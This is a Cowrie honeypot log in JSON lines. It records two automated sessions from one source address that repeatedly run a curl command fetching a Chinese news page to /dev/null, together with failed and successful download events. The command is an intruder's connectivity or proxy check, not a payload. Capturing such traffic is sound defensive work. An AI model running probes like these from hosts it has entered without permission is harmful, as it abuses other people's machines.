{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.398194Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:06.401358Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.402171Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:06.436474Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.437376Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:06.440997Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.441959Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.459836Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:06.471110Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.472170Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:06.477638Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.478741Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.481454Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:06.529235Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.530246Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:06.538938Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.539884Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:06.573827Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.574928Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:06.583287Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.584090Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.596184Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.597622Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:06.613528Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.614497Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:06.625609Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.626498Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:06.653780Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.654853Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:06.671852Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.672717Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.692488Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:06.701633Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.702705Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:06.717556Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.718588Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:06.747657Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.748708Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.751027Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:06.773467Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.774473Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:06.795772Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.796658Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:06.816497Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.817332Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:06.838531Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.839612Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.842957Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.848858Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.850229Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:06.861531Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.862467Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.873336Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:06.890635Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.891700Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.966836Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.968071Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.970798Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:06.971972Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.972729Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.974904Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:06.975949Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:07.009361Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.010485Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.015418Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.017412Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:07.019575Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.020754Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:07.055305Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.056304Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.065597Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.067966Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:07.069569Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.070529Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:07.111724Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.112697Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.114224Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.115713Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:07.124959Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.126185Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.162624Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:07.169322Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.170315Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:07.183603Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.184500Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.207815Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.226534Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.259198Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.278221Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.303517Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:07.319151Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.320175Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:07.333500Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.334531Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:07.374696Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.375568Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:07.388496Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.389423Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.431467Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:07.438991Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.440104Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:07.455656Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.456637Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:07.487830Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.488777Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:07.505797Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.506890Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.525038Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:07.527157Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.528590Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:07.548347Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.549284Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.566903Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:07.570903Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.571938Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:07.596709Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.598057Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.607755Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.608958Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:07.619576Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.620706Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:07.643950Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.647034Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:07.662715Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
